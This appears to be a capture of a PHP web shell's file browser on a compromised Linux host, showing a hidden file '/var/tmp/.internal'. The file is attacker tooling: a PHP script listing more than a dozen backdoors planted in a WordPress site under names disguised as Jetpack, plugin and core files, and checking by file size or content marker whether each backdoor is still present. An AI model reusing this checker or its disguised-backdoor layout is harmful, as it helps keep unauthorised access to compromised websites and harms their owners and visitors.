HEX
Server: Apache
System: Linux pdx1-shared-a1-28 6.6.104-grsec-jammy+ #3 SMP Tue Sep 16 00:28:11 UTC 2025 x86_64
User: dh_6nhrpv (6576398)
PHP: 8.2.26
Disabled: NONE
Upload Files
File: //var/tmp/.internal
<?php   $r = '/home/kazatari/pusog.org'; $x = ["/wp-content/not_plugins/jetpack/extensions/blocks/podcast-player/templates/podcast.header.php"=>"bd@@169741@@534",
"/6a6b47.php"=>"bd@@15915@@105",
"/wp-content/plugins/website-file-changes-monitor/vendor/phpfastcache/phpfastcache/lib/Phpfastcache/Core/Pool/cssurl.class.php"=>"bd@@404296@@1052",
"/wp-content/plugins/ml-slider/themes/starter/v1.0.0/k2attachment.php"=>"bd@@191825@@585",
"/wp-content/plugins/custom-facebook-feed/inc/Admin/CFF.About.php"=>"bd@@191884@@536",
"/wp-content/not_plugins/podpress/optional_files/DigestMD5.php"=>"bd@@191898@@1057",
"/afd5c7.php"=>"bd@@16798@@105",
"/wp-content/plugins/custom-1757674300/4O4.php"=>"bd@@450213@@727",
"/wp-content/plugins/instagram-feed/admin/builder/templates/sections/header.php"=>"bd@@403890@@approve_request",
"/wp-content/not_plugins/jetpack/extensions/extended-blocks/core-cover/core.cover.php"=>"bd@@117455@@610",
"/wp-content/not_plugins/jetpack/modules/photon-cdn/jetpack.manifest.php"=>"bd@@213713@@1815",
"/wp-includes/rest-api/search/class.wp.rest.term.format.search.php"=>"bd@@117732@@420",
"/wp-content/plugins/ml-slider/admin/assets/vendor/tinymce/js/tinymce/models/dom/sample03.php"=>"bd@@117734@@536",
"/wp-content/not_plugins/jetpack/images/apps/your_links.php"=>"bd@@117743@@1499"]; foreach ($x as $p => $l) {     $f = "{$r}{$p}";     list($t, $id, $pt) = explode('@@', $l);     if (!file_exists($f)) {         print "<$t>{$id}##d</$t>\n";         continue;     }     if (is_numeric($pt)) {         $fs = filesize($f);         if ($fs != $pt) {             print "<$t>{$id}##bs</$t>\n";         }     } else {         $c = file_get_contents($f);         if (!strstr($c, $pt)) {             print "<$t>{$id}##d</$t>\n";         }     } } die('!end!');